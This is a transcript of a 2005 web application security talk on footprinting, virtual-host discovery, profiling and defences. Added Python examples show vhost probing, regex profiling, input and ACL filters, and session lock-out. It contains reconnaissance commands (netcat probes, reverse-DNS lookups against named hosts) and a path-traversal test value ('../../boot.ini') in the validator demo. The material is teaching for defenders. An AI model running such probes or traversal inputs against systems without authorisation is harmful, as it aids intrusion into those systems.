Web Application Kung-Fu, Art of Defense (Bellua/HITB)

    Web Application Kung-Fu, Art of Defense (Bellua/HITB) - Presentation Transcript

    1. Web Application Kung-Fu, The Art of Defense
       Shreeraj Shah, Director, Net Square
       Bellua 2005, Jakarta, Indonesia
    2. Eye Opening Information
       • 95% of companies were hacked through web applications, and 5% of them were aware of it (FBI/CSI, 2002)
       • The most popular attacks are against web servers (incident.org)
       • 3 out of 4 web sites are vulnerable to attack (Gartner)
       • 75% of hacks occur at the application level (Gartner)
       • Web application incidents cost companies 320 million USD in 2001 alone (Gartner)
       • WHY???
       © Shreeraj Shah
    3. Why? – Web Application
       • Understanding evolutions
         – Infrastructure
         – Web Application
       • Complex application requirements
       • Integrated approach: mobile app, browser access, intranet data sharing
       • Internet presence is most important
       • The application is open to all, since that is the purpose behind launching it.
    4. Background
    5. Infrastructure Evolution - 1 (diagram: Internet, router, intranet with www, mail and Database servers)
    6. Infrastructure Evolution - 2 (diagram: adds Other Offices, Internet Exchange, DMZ, Dial-up/RAS and VPN)
    7. Infrastructure Evolution - 3 (diagram: as slide 6, with a firewall in front of the DMZ)
    8. Defense posture and Evolution (diagram: layers Web Services / Business Application Level / Application Level (web, customized etc.) / Services Level (IIS web, SMTP, POP etc.) / Operating System Level (ipc$, wu-ftpd, sunrpc etc.); traditional attacks: brute force, RPC buffer overflow, null session etc.)
    9. Defense posture and Evolution (diagram: same layers; traditional attacks blocked (X) by firewall, VPN, IDS, auth server etc.)
    10. Defense posture and Evolution (diagram: next generation attacks, SQL injection and parameter tampering, reach the application level; added defense at the lower levels: accounts, shares, patches, updates, logging, auditing, ports, registries etc.)
    11. Defense posture and Evolution (diagram: an application layer content filtering firewall blocks (X) the last generation attacks at the application level)
    12. Defense posture and Evolution (diagram: web services attacks reach the Web Services layer above the application layer firewall)
    13. Evolution of Web applications (diagram: Web Client -> DMZ Web Server (static pages: HTML, HTM etc.) -> Scripted Web Engine (dynamic pages: ASP, DHTML, PHP, CGI etc.) -> DB in the Internal/Corporate zone)
    14. Evolution of Web applications (diagram: adds a Trusted zone with Application Servers, e.g. WebLogic, ColdFusion, between the scripted engine and the DB)
    15. Evolution of Web applications (diagram: adds middle layer components, e.g. COM, Beans, in the Trusted zone)
    16. Evolution of Web applications (diagram: application servers replaced by an integrated framework, e.g. ASP.NET with .NET, J2EE App Server, Web Services)
    17. Evolution of Web applications (diagram: adds a SOAP Web Service Client next to the Web Client, both talking to the Web Server)
    18. Application Analysis Framework
       • Black Box Method: analyzing the application from an attacker's perspective, seeing only the web resources available to a common user, e.g. ports 80 and 443.
       • White Box Method: analyzing the application with full knowledge and access: deployment setup, source code and the other resources on the box.
    19. Kung Fu begins
    20. Methodology (flow: Footprinting -> Discovery -> Profiling -> Manual Attacks -> Auto Attacks -> Exploit -> Defense)
    21. Footprinting
    22. Objective
       • IP and port as the starting point for assessment: a myth
       • What if the IP is multi-hosted?
       • Will it respond without a Host: header in the HTTP request?
       • One IP can have more applications to assess
       • The objective of footprinting is to find all possible combinations of hosts on an IP.
       • How?
    23. Example of multihost
       • httpd.conf of Apache
         <VirtualHost *:80>
             # ServerAdmin webmaster@dummy-host.example.com
             DocumentRoot /usr/local/apache2/htdocs
             # ErrorLog logs/dummy-host.example.com-error_log
             # CustomLog logs/dummy-host.example.com-access_log common
         </VirtualHost>
         <VirtualHost *:80>
             # ServerAdmin webmaster@dummy-host.example.com
             DocumentRoot /usr/local/apache2/htdocs/blue
             ServerName www.blue.com
             # ErrorLog logs/dummy-host.example.com-error_log
             # CustomLog logs/dummy-host.example.com-access_log common
         </VirtualHost>
         <VirtualHost *:80>
             # ServerAdmin webmaster@dummy-host.example.com
             DocumentRoot /usr/local/apache2/htdocs/red
             ServerName www.red.com
             # ErrorLog logs/dummy-host.example.com-error_log
             # CustomLog logs/dummy-host.example.com-access_log common
         </VirtualHost>
    24. Example of multihost
       • Default Access
         C:\Documents and Settings\Administrator> nc 203.88.128.10 80
         HEAD / HTTP/1.0
         HTTP/1.1 200 OK
         Date: Tue, 11 Jan 2005 20:17:40 GMT
         Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
         Content-Location: index.html.en
         Vary: negotiate,accept-language,accept-charset
         TCN: choice
         Last-Modified: Fri, 04 May 2001 00:01:18 GMT
         ETag: "1c4d0-5b0-40446f80;1c4e6-961-8562af00"
         Accept-Ranges: bytes
         Content-Length: 1456
         Connection: close
         Content-Type: text/html; charset=ISO-8859-1
         Content-Language: en
         Expires: Tue, 11 Jan 2005 20:17:40 GMT
    25. Example of multihost
       • www.blue.com
         C:\Documents and Settings\Administrator> nc 203.88.128.10 80
         HEAD / HTTP/1.0
         Host: www.blue.com
         HTTP/1.1 200 OK
         Date: Tue, 11 Jan 2005 20:17:45 GMT
         Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
         Last-Modified: Tue, 04 Jan 2005 23:10:29 GMT
         ETag: "1865-b-f991a340"
         Accept-Ranges: bytes
         Content-Length: 11
         Connection: close
         Content-Type: text/html; charset=ISO-8859-1
    26. Example of multihost
       • www.red.com
         C:\Documents and Settings\Administrator> nc 203.88.128.10 80
         HEAD / HTTP/1.0
         Host: www.red.com
         HTTP/1.1 200 OK
         Date: Tue, 11 Jan 2005 20:17:57 GMT
         Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
         Last-Modified: Tue, 04 Jan 2005 23:16:57 GMT
         ETag: "1cc0b-9-10b20c40"
         Accept-Ranges: bytes
         Content-Length: 9
         Connection: close
         Content-Type: text/html; charset=ISO-8859-1
    27. How to find hosts?
       • Whois can help in determining the name server
       • Look for PTR records if available.
       • If not, bad luck!
       • There are a few whois services out there that can help in digging the database and fetching what you are looking for – key
       • Let's see!
    28. Whois
         C:\Program Files\GnuWin32\bin>jwhois -h whois.arin.net 203.88.128.10
         [Querying whois.arin.net]
         [whois.arin.net]
         OrgName:    XYZ corp
         OrgID:      XYZC
         Address:    101 First Avenue
         City:       NYC
         StateProv:  NY
         PostalCode: 94089
         Country:    US
         NetRange:   203.88.128.0 – 203.88.128.255
         CIDR:       203.88.128.0/20
         NetName:    XYZC-4
         NetHandle:  NET-203-88-128-0-1
         Parent:     NET-203-0-0-0-0
         NetType:    Direct Allocation
         NameServer: ns1.xyz.com
         NameServer: ns2.xyz.com
         Comment:
         RegDate:    2003-07-17
         Updated:    2003-07-17
         OrgTechHandle: NA098-ARIN
         OrgTechName:   Netblock Admin
         OrgTechPhone:  +1-212-999-9999
         OrgTechEmail:  netblockadmin@xyz.com
         # ARIN WHOIS database, last updated 2005-01-10 19:10
         # Enter ? for additional hints on searching ARIN's WHOIS database.
         C:\Program Files\GnuWin32\bin>
    29. Query PTR on name server
         C:\Documents and Settings\Administrator>nslookup
         Default Server:  ns1.icenet.net
         Address:  203.88.128.7
         > server ns1.xyz.com
         Default Server:  [203.88.128.250]
         Address:  203.88.128.250
         > 203.88.128.10
         Server:  [203.88.128.250]
         Address:  203.88.128.250
         Name:    www.blue.com        (Bingo!)
         Address:  192.168.7.50
         > set type=PTR
         > 203.88.128.10
         Server:  [203.88.128.250]
         Address:  203.88.128.250
         10.128.88.203.in-addr.arpa    name = www.blue.com
         10.128.88.203.in-addr.arpa    name = www.red.com
         >
    30. What if PTR is not there?
       • I know it sucks!
         C:\Documents and Settings\Administrator>nslookup
         Default Server:  ns1.icenet.net
         Address:  203.88.128.7
         > server 203.88.128.250
         Default Server:  icedns1.icenet.net
         Address:  203.88.128.250
         > 203.88.128.11
         Server:  icedns1.icenet.net
         Address:  203.88.128.250
         Name:    ice.128.client11.icenet.net
         Address:  203.88.128.11
         > set type=PTR
         > 203.88.128.11
         Server:  icedns1.icenet.net
         Address:  203.88.128.250
         Non-authoritative answer:
         11.128.88.203.in-addr.arpa    name = ice.128.client11.icenet.net
         > 203.88.128.11
         Server:  icedns1.icenet.net
         Address:  203.88.128.250
         Non-authoritative answer:
         11.128.88.203.in-addr.arpa    name = ice.128.client11.icenet.net
    31. Digging whois services
       • Some special whois services provide the following info: http://whois.webhosting.info/IP – Bingo!
    32. Got it!
       • We got all possible hosts on any single IP
       • Now assessment is possible using "Host:"
       • We can assess all applications, and the server will serve the right info on both HTTP/1.0 and HTTP/1.1
    33. Discovery
    34. Objective
       • The objective is to find live hosts which serve something other than the default content.
       • So one can list all live applications on a single IP
       • HEAD/GET can help in doing so.
    35. Discovering applications
         C:\Documents and Settings\Administrator>nc 203.88.128.11 80
         HEAD / HTTP/1.0
         HTTP/1.1 404 Object Not Found
         Server: Microsoft-IIS/4.0
         Date: Thu, 27 Jan 2005 10:12:16 GMT
         Content-Type: text/html
         Content-Length: 102
         <html><head><title>Error</title></head><body>The system cannot find the file specified. </body></html>
    36. Discovering applications
         C:\Documents and Settings\Administrator>nc 203.88.128.11 80
         HEAD / HTTP/1.0
         Host: junk
         HTTP/1.1 404 Object Not Found
         Server: Microsoft-IIS/4.0
         Date: Thu, 27 Jan 2005 10:14:37 GMT
         Content-Type: text/html
         Content-Length: 102
         <html><head><title>Error</title></head><body>The system cannot find the file specified. </body></html>
    37. Discovering applications
         C:\Documents and Settings\Administrator>nc 203.88.128.11 80
         HEAD / HTTP/1.0
         Host: icenet.net
         HTTP/1.1 200 OK
         Server: Microsoft-IIS/4.0
         Content-Location: http://icenet.net/index.htm
         Date: Tue, 11 Jan 2005 10:07:12 GMT
         Content-Type: text/html
         Accept-Ranges: bytes
         Last-Modified: Wed, 05 Jan 2005 06:52:02 GMT
         ETag: "0553fff3f2c41:b3ae6"
         Content-Length: 33442
    38. Discovering applications
         C:\Documents and Settings\Administrator>nc 203.88.128.11 80
         HEAD / HTTP/1.0
         Host: adanigroup.com
         HTTP/1.1 200 OK
         Server: Microsoft-IIS/4.0
         Content-Location: http://adanigroup.com/index.htm
         Date: Tue, 11 Jan 2005 10:07:24 GMT
         Content-Type: text/html
         Accept-Ranges: bytes
         Last-Modified: Wed, 28 Apr 2004 14:51:55 GMT
         ETag: "80771d59302dc41:b3ae6"
         Content-Length: 806
    39. Discovering applications
         C:\Documents and Settings\Administrator>nc 203.88.128.11 80
         HEAD / HTTP/1.0
         Host: www.mundraport.com
         HTTP/1.1 200 OK
         Server: Microsoft-IIS/4.0
         Content-Location: http://www.mundraport.com/index.htm
         Date: Tue, 11 Jan 2005 10:09:56 GMT
         Content-Type: text/html
         Accept-Ranges: bytes
         Last-Modified: Thu, 01 Jul 2004 05:59:09 GMT
         ETag: "80f45486305fc41:b3ae6"
         Content-Length: 607
    40. Discovery
       • Got all possible live hosts now.
       • We have the combination of IP, port and host.
       • The above three can help in getting the right information out.
       • Application review is possible and the scope would be complete for any specified IP address.
    41. Demo Application
       • Windows 2000 running IIS
       • DVD web store
       • Consumer application
       • Part of the web application deals with the business model: access to the dealer network and such.
       DEMO
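The footprinting and discovery steps above, done programmatically: an added example (not from the deck) that sends HEAD / with and without a Host: header and keeps only the hosts whose response fingerprint differs from the server's default answer. The sample responses are constructed from the slides' transcripts; tcp_sender is the only part that touches the network, and the status/Content-Length/ETag fingerprint is this example's choice.

```python
"""Virtual host discovery: HEAD / with different Host: headers against one IP,
keeping the hosts whose answer differs from the default. Added example."""
import socket
from typing import Callable, Dict, Iterable, Optional, Tuple

# (status line, Content-Length, ETag, Content-Location): enough to tell two
# virtual hosts apart even when both answer 200, as the Apache slides show.
Fingerprint = Tuple[str, str, str, str]


def build_head_request(host: Optional[str]) -> bytes:
    """HEAD / HTTP/1.0, with or without a Host: header (both cases are on the slides)."""
    lines = ["HEAD / HTTP/1.0"]
    if host is not None:
        lines.append(f"Host: {host}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw response into its status line and a lower-cased header map."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *header_lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status.strip(), headers


def fingerprint(raw: bytes) -> Fingerprint:
    status, h = parse_response(raw)
    return (status, h.get("content-length", ""), h.get("etag", ""),
            h.get("content-location", ""))


def discover_vhosts(candidates: Iterable[str],
                    send: Callable[[Optional[str]], bytes]) -> Dict[str, Fingerprint]:
    """Hosts whose HEAD / answer differs from both baselines: the request with
    no Host: header and one with a junk host name (slides 35 and 36)."""
    baselines = {fingerprint(send(None)), fingerprint(send("junk.invalid"))}
    live: Dict[str, Fingerprint] = {}
    for host in candidates:
        fp = fingerprint(send(host))
        if fp not in baselines:
            live[host] = fp
    return live


def tcp_sender(ip: str, port: int = 80, timeout: float = 5.0) -> Callable[[Optional[str]], bytes]:
    """Real transport, one connection per probe, for servers you are authorised to assess."""
    def send(host: Optional[str]) -> bytes:
        with socket.create_connection((ip, port), timeout=timeout) as sock:
            sock.sendall(build_head_request(host))
            chunks = []
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        return b"".join(chunks)
    return send


def canned_sender(default: bytes, per_host: Dict[str, bytes]) -> Callable[[Optional[str]], bytes]:
    """Offline transport answering with constructed responses."""
    def send(host: Optional[str]) -> bytes:
        return per_host.get(host, default)
    return send


# Constructed responses modelled on slides 35-39 (IIS) and 24-26 (Apache);
# trimmed to the headers the fingerprint uses, not captured from a live server.
IIS_DEFAULT = (b"HTTP/1.1 404 Object Not Found\r\nServer: Microsoft-IIS/4.0\r\n"
               b"Content-Type: text/html\r\nContent-Length: 102\r\n\r\n")
IIS_HOSTS = {
    "icenet.net": (b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/4.0\r\n"
                   b"Content-Location: http://icenet.net/index.htm\r\n"
                   b'ETag: "0553fff3f2c41:b3ae6"\r\nContent-Length: 33442\r\n\r\n'),
    "adanigroup.com": (b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/4.0\r\n"
                       b"Content-Location: http://adanigroup.com/index.htm\r\n"
                       b'ETag: "80771d59302dc41:b3ae6"\r\nContent-Length: 806\r\n\r\n'),
}
APACHE_DEFAULT = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.0.50 (Unix)\r\n"
                  b"Content-Location: index.html.en\r\n"
                  b'ETag: "1c4d0-5b0-40446f80;1c4e6-961-8562af00"\r\nContent-Length: 1456\r\n\r\n')
APACHE_HOSTS = {
    "www.blue.com": (b"HTTP/1.1 200 OK\r\nServer: Apache/2.0.50 (Unix)\r\n"
                     b'ETag: "1865-b-f991a340"\r\nContent-Length: 11\r\n\r\n'),
    "www.red.com": (b"HTTP/1.1 200 OK\r\nServer: Apache/2.0.50 (Unix)\r\n"
                    b'ETag: "1cc0b-9-10b20c40"\r\nContent-Length: 9\r\n\r\n'),
}

if __name__ == "__main__":
    found = discover_vhosts(["icenet.net", "adanigroup.com", "nothere.example"],
                            canned_sender(IIS_DEFAULT, IIS_HOSTS))
    for host, fp in found.items():
        print(host, fp)
```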
    42. Profiling
    43. Profile
       • Profiling a web application is a very important task to identify possible attacks.
       • The objective is to find: where do we get a cookie? Where are the forms? Does it have applets or objects? Are query strings around or not? And such.
       • Regex can be used on the HTML code to fetch this info.
       • Let's see the demo & method. DEMO
    44. Web Application Profile (table; columns: URL (Asset), Form, Cmnt, Email, Applet, Object, Cookie, Auth., Path, Script, QryStr; the X marks per asset are not recoverable from the transcript)
       Assets listed: /, /cart.asp, /include/styles.css, /privacy.asp, /catalog.asp, /aboutus.asp, /details.asp?id=1, /details.asp?id=2, /details.asp?id=3, /rebates.asp, /catalog.asp?start=3, /rebates.asp?loc=beckham.html, /rebates.asp?loc=zhivago.html, /orderapp/default.asp?login=yes, /orderapp/include/styles.css, /rebates.asp?loc=monsoon.html, /details.asp?id=4, /rebates.asp?loc=lawrence.html, /details.asp?id=5, /details.asp?id=6, /catalog.asp?start=6
    45. Web Application Assets
       • Each identified attribute can have a vulnerability.
       • A vulnerability can be exploited by a hacker.
       • Forms and query strings are the major source of exploitation.
       • Other parameters like cookies, scripts (client-side Java, VB etc.) and path info (include, cgi-bin, servlet etc.) expose business level information.
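The regex profiling method the slide describes, as an added example that is not the deck's own tool: each asset gets the ten attribute flags of the profile table, and render_table prints the X matrix. The sample pages are constructed; the patterns and the list of sensitive path components are this example's assumptions.

```python
"""Regex profiler producing the attribute table of slide 44. Added example."""
import re
from typing import Dict, Iterable, Tuple
from urllib.parse import urlsplit

ATTRIBUTES = ["Form", "Cmnt", "Email", "Applet", "Object", "Cookie",
              "Auth.", "Path", "Script", "QryStr"]

# Attributes that show up in the HTML body itself.
HTML_PATTERNS = {
    "Form": re.compile(r"<form\b", re.I),
    "Cmnt": re.compile(r"<!--.*?-->", re.S),
    "Email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+", re.I),
    "Applet": re.compile(r"<applet\b", re.I),
    "Object": re.compile(r"<object\b", re.I),
    "Script": re.compile(r"<script\b", re.I),
}
# Path components the deck singles out as exposing business-level information.
SENSITIVE_PATH = re.compile(r"(^|/)(include|cgi-bin|servlet)(/|$)", re.I)
# A password field marks the asset as part of form-based authentication.
PASSWORD_FIELD = re.compile(r"""<input\b[^>]*type\s*=\s*["']?password""", re.I)

Page = Tuple[str, Dict[str, str], str]  # (url, response headers, html body)


def profile_page(url: str, headers: Dict[str, str], html: str) -> Dict[str, bool]:
    """One row of the profile table for a single asset."""
    parts = urlsplit(url)
    hdrs = {k.lower(): v for k, v in headers.items()}
    row = {name: bool(pat.search(html)) for name, pat in HTML_PATTERNS.items()}
    row["Cookie"] = "set-cookie" in hdrs          # the asset hands out a cookie
    row["Auth."] = "www-authenticate" in hdrs or bool(PASSWORD_FIELD.search(html))
    row["Path"] = bool(SENSITIVE_PATH.search(parts.path))
    row["QryStr"] = bool(parts.query)
    return row


def profile_site(pages: Iterable[Page]) -> Dict[str, Dict[str, bool]]:
    """Profile every crawled asset; keyed by URL so rows can be joined later."""
    return {url: profile_page(url, headers, html) for url, headers, html in pages}


def render_table(profile: Dict[str, Dict[str, bool]]) -> str:
    """Render the X matrix the way slide 44 shows it."""
    width = max((len(u) for u in profile), default=11)
    lines = ["URL (Asset)".ljust(width) + "  " + " ".join(a.ljust(6) for a in ATTRIBUTES)]
    for url, row in profile.items():
        marks = " ".join(("X" if row[a] else "").ljust(6) for a in ATTRIBUTES)
        lines.append(url.ljust(width) + "  " + marks)
    return "\n".join(lines)


# Constructed sample assets modelled on the demo store's URL list (not captured).
SAMPLE_PAGES = [
    ("/", {"Content-Type": "text/html"},
     "<html><applet codebase=./code/></applet><script src=/s.js></script></html>"),
    ("/details.asp?id=1", {"Content-Type": "text/html"},
     "<html><!-- code in db.inc changed 12/12/2002 by John -->"
     "<a href='mailto:admin@example.com'>mail</a></html>"),
    ("/orderapp/default.asp?login=yes", {"Set-Cookie": "ASPSESSIONID=abc; path=/"},
     "<form action=/orderapp/login.asp method=post>"
     "<input type=password name=pass></form>"),
    ("/include/styles.css", {"Content-Type": "text/css"}, "body { color: #000 }"),
]

if __name__ == "__main__":
    print(render_table(profile_site(SAMPLE_PAGES)))
```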
    46. Impact Trail across the Model (Form and Query String)
    47. Impact Trail – Form / Query String (diagram: client side processing on the web client -> parameter processing in the scripted engine -> variable processing in the application servers / middle layer components -> query processing in the DB)
    48. Impact Trail – Form / Query String (diagram as slide 47, with a query string request traced through it)
         c:\tools>nc <HOST> 80
         GET /account.asp?id=5 HTTP/1.0
         …
    49. Impact Trail – Form / Query String (diagram as slide 47, with a form POST traced through it)
         c:\tools>nc <HOST> 80
         POST /account.asp HTTP/1.0
         …
         Id=5&customer=6
    50. Impact Trail across the Model (Comment and Email)
    51. Impact Trail – Comments / Email (diagram: information usage traced across web client, web server, scripted engine, application servers, components and DB)
    52. Impact Trail – Comments / Email (diagram as slide 51, with examples of the information leaked in the HTML)
         ….. <a HREF="mailto:admin@example.com">...
         …. <!-- code in db.inc changed 12/12/2002 by John --> ….
    53. Impact Trail across the Model (Applet and Object)
    54. Impact Trail – Applet / Object (diagram: client side processing on the web client, data processing in the application servers / middle layer)
    55. Impact Trail – Applet / Object (diagram as slide 54, with example tags from the HTML)
         ….. <applet codebase=./code/> … </applet>
         …. <object classid=5672….></object>
    56. Impact Trail across the Model (Cookie and Authentication)
    57. Impact Trail – Cookie (diagram: session cookie and application cookie on the client side; session decision and session usage in the scripted engine / application servers; session management in the middle layer; transport layer state underneath)
    58. Impact Trail – Cookie (diagram as slide 57, with the response header that sets the cookies)
         HTTP/1.x 200 OK
         ….
         Set-Cookie: ASPSESSIONIDCSSBBRQR=MKELONCBPANNHEKHCFGABJGB; CID=1
    59. Impact Trail – Authentication (diagram: client side control -> ACL processing -> ACL based decisions in the application servers; data access based on ACL in the components / DB)
    60. Impact Trail – Authentication (diagram as slide 59, with the authentication types: form based (user/pass), NTLM/BASIC/DIGEST etc.)
    61. Profile Observations (table: logic layers Presentation, Business, Data Access vs attributes Form, Cmnt, Email, Applet, Object, Cookie, Auth., Path, Script, QryStr; the Presentation row carries the most marks, Business fewer, Data Access none; exact cells are not recoverable from the transcript)
    62. Attacks & Art of Defense
    63. Profiling Attacks (table: assets Form, Cmnt, Email, Applet, Object, Cookie, Auth., Path, Script, QryStr vs attack classes Input Validation, Authorization, Parameter Tampering, Authentication, Brute Forcing, Session Management, SQL Manipulation, File Operations, Information Leakage, Error/Exception management, Client Side Manipulation, Java Decompile, Cryptography, Buffer Overflows, Remote Command Execution; cell marks are not recoverable from the transcript)
    64. Asset to Attack Mapping (same table as slide 63)
    65. Input Validation, Authorization, Parameter Tampering
    66. Severity and Damages
       • Access to internal information.
       • Unauthorized access to the content.
       • Injection of unnecessary characters into the application layer.
       • Forcing application errors.
       • Bypassing ACL rules.
       • Breaking the flow of the application and its logic.
    67. Input Validation Attack Points (diagram: input validation attacks enter through forms and query strings; DEMO)
    68. Authorization Attack Points (diagram: authorization attacks enter through forms and query strings; DEMO)
    69. Parameter Tampering Attack Points (diagram: parameter tampering through forms, query strings, cookies and client-side scripts; DEMO)
    70. Defense Strategies (diagram: three filters on the request path: a filter for input characters, tight variable level control to combat parameter tampering, and application level ACL to combat authorization attacks; Filter 1 and Filter 2 sit at the web server / scripted engine, Filter 3 at the middle layer)
    71. Art of Defense
       • Filtering content using a secure routine (regex or other logic)
       • ISAPI level defense for the application using URLScan or other tools.
       • Tight ACL at the application layer.
       • Secure code review and analyzing the variable trail – impact analysis
       • Black box testing before deployment.
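The three filters of the Defense Strategies slide, written for the demo store's pages as an added example (not the deck's code): an allowlist per variable, an allowlist of variables per page, and an ACL decision taken from the session user rather than from the id in the request. PARAM_RULES, PAGE_PARAMS and ACCOUNT_OWNERS are assumptions made up for the demo store.

```python
"""Input validation, parameter tampering and authorization filters for the
demo store's pages (details.asp, catalog.asp, rebates.asp, account.asp).
Added example, not the deck's code."""
import re
from typing import Dict, Set
from urllib.parse import parse_qs, urlsplit


class RejectedRequest(Exception):
    """Request blocked before it reaches application logic."""


class Forbidden(RejectedRequest):
    """Authenticated user asked for a resource the ACL does not grant."""


# Filter 1: what each variable may look like, stated positively. Anything
# else (";exec", "../", quotes, letters in a number) fails without a denylist.
PARAM_RULES = {
    "id": re.compile(r"[1-9][0-9]{0,8}"),
    "start": re.compile(r"[0-9]{1,6}"),
    "loc": re.compile(r"[a-z0-9_-]{1,32}\.html"),
    "login": re.compile(r"yes|no"),
}

# Filter 2: which variables each page of the profile (slide 44) may receive.
# Every variable is optional (the profile lists /catalog.asp with and without start).
PAGE_PARAMS: Dict[str, Set[str]] = {
    "/details.asp": {"id"},
    "/catalog.asp": {"start"},
    "/rebates.asp": {"loc"},
    "/account.asp": {"id"},
    "/orderapp/default.asp": {"login"},
}

# Filter 3: constructed ACL data, account id -> owning user.
ACCOUNT_OWNERS: Dict[int, str] = {5: "alice", 6: "bob"}


def validate_request(url: str) -> Dict[str, str]:
    """Return the cleaned query variables or raise RejectedRequest."""
    parts = urlsplit(url)
    allowed = PAGE_PARAMS.get(parts.path)
    if allowed is None:
        raise RejectedRequest(f"unknown page {parts.path}")
    # parse_qs percent-decodes, so the rules see what the application would see.
    query = parse_qs(parts.query, keep_blank_values=True)
    clean: Dict[str, str] = {}
    for name, values in query.items():
        if name not in allowed:
            raise RejectedRequest(f"variable {name!r} not accepted by {parts.path}")
        if len(values) != 1:
            raise RejectedRequest(f"variable {name!r} supplied more than once")
        if not PARAM_RULES[name].fullmatch(values[0]):
            raise RejectedRequest(f"variable {name!r} failed validation")
        clean[name] = values[0]
    return clean


def authorize_account(session_user: str, clean: Dict[str, str]) -> int:
    """account.asp?id=N: serve the account only if the session's user owns it.
    Changing id=5 to id=6 in the request is refused, not silently served."""
    account_id = int(clean["id"])
    if ACCOUNT_OWNERS.get(account_id) != session_user:
        raise Forbidden(f"{session_user} may not read account {account_id}")
    return account_id


def handle(url: str, session_user: str) -> str:
    """Order from the Defense Strategies slide: input filters first, ACL next."""
    clean = validate_request(url)
    path = urlsplit(url).path
    if path == "/account.asp":
        return f"account {authorize_account(session_user, clean)} for {session_user}"
    return f"{path} with {clean}"


def is_rejected(url: str) -> bool:
    """True when the filters stop the request before any page logic runs."""
    try:
        validate_request(url)
    except RejectedRequest:
        return True
    return False


if __name__ == "__main__":
    print(handle("/details.asp?id=1", "alice"))
    print(is_rejected("/rebates.asp?loc=../../boot.ini"))
```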
    72. Asset to Attack Mapping (same table as slide 63)
    73. Authentication, Brute Force, Session Management
    74. Severity and Damages
       • Unauthenticated access to resources.
       • Application layer user/pass info; may lead to privilege escalation.
       • Session hijacking and spoofing.
       • Damage to critical information.
       • Database access.
    75. Authentication Attack Points (diagram: authentication attacks enter through forms; DEMO)
    76. Brute Force Attack Points (diagram: brute force attacks through forms, the auth. page and cookies; DEMO)
    77. Session Management Attack Points (diagram: session management attacks through forms, query strings and cookies; DEMO)
    78. Defense Strategies (diagram: secure tunnel between client and web server; tight session ID, decisions based on session variables and lower use of application level cookies at the scripted engine / application servers; application layer account lock-out at the middle layer / DB)
    79. Art of Defense
       • Secure channels
       • Strong session ID (hard to guess and random in nature)
       • Use session variables, not application layer cookies and such.
       • Application layer user/pass lock-out.
       • Strong password policy.
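Session handling that follows the bullets above, as an added example (not the deck's code): a session id from the OS CSPRNG, the customer decision kept in a server-side session variable instead of a CID cookie like the one on slide 58, and an application layer lock-out after MAX_FAILURES bad passwords. USERS, the thresholds and the cookie name are constructed for the example.

```python
"""Session ID, server-side session variables and account lock-out. Added example."""
import hashlib
import hmac
import os
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple

MAX_FAILURES = 5        # bad passwords before the account locks (assumed policy)
LOCKOUT_SECONDS = 900   # how long the lock lasts (assumed policy)
PBKDF2_ROUNDS = 100_000


class AccountLocked(Exception):
    pass


@dataclass
class Session:
    user: str
    created: float
    data: Dict[str, object] = field(default_factory=dict)  # server-side session variables


def make_user(password: str, customer_id: int) -> Dict[str, object]:
    """Constructed user record: salted PBKDF2 hash, never the plain password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return {"salt": salt, "hash": digest, "customer_id": customer_id}


# Constructed sample user table.
USERS: Dict[str, Dict[str, object]] = {"alice": make_user("correct horse battery", 1)}


def check_password(user: str, password: str) -> bool:
    record = USERS.get(user)
    if record is None:
        # Hash anyway so an unknown user costs the same time as a wrong password.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\0" * 16, PBKDF2_ROUNDS)
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], PBKDF2_ROUNDS)
    return hmac.compare_digest(digest, record["hash"])


class SessionStore:
    def __init__(self, now: Callable[[], float] = time.time) -> None:
        self._sessions: Dict[str, Session] = {}
        self._failures: Dict[str, Tuple[int, float]] = {}  # user -> (count, last failure)
        self._now = now

    @staticmethod
    def new_id() -> str:
        # 256 bits from the OS CSPRNG: not a counter, a timestamp or a user id.
        return secrets.token_urlsafe(32)

    def login(self, user: str, password: str) -> Optional[str]:
        """Return a session id, None on a bad password, or raise AccountLocked."""
        count, last = self._failures.get(user, (0, 0.0))
        within_window = self._now() - last < LOCKOUT_SECONDS
        if count >= MAX_FAILURES and within_window:
            raise AccountLocked(user)
        if not check_password(user, password):
            self._failures[user] = (count + 1 if within_window else 1, self._now())
            return None
        self._failures.pop(user, None)
        sid = self.new_id()
        customer_id = USERS[user]["customer_id"]
        self._sessions[sid] = Session(user, self._now(), {"customer_id": customer_id})
        return sid

    def resolve(self, sid: str) -> Optional[Session]:
        return self._sessions.get(sid)

    def customer_for(self, sid: str) -> Optional[int]:
        """The decision value comes from the session, not from a CID cookie."""
        session = self.resolve(sid)
        return None if session is None else session.data["customer_id"]

    @staticmethod
    def cookie_header(sid: str) -> str:
        # Secure: only over the encrypted channel; HttpOnly: out of reach of page scripts.
        return f"Set-Cookie: SID={sid}; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("alice", "correct horse battery")
    print(store.cookie_header(sid), store.customer_for(sid))
```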
    80. SQL Manipulation
    81. Severity and Damages
       • Direct database access
       • May manipulate or damage the database
       • Depending on the role of the application, one can get root or admin level access on the system
       • Database enumeration and disclosure of critical information.
    82. SQL Manipulation Attack Points (diagram: SQL manipulation through forms and query strings, reaching the DB; DEMO)
    83. Defense Strategies (diagram: input filtering at the web server, application layer filtering at the scripted engine / application servers, secure database access component at the middle layer; at the DB: 1. application role and access, 2. tighter password, 3. usage of SPs)
    84. Art of Defense
       • Web server level input filtering.
       • Application layer filtering
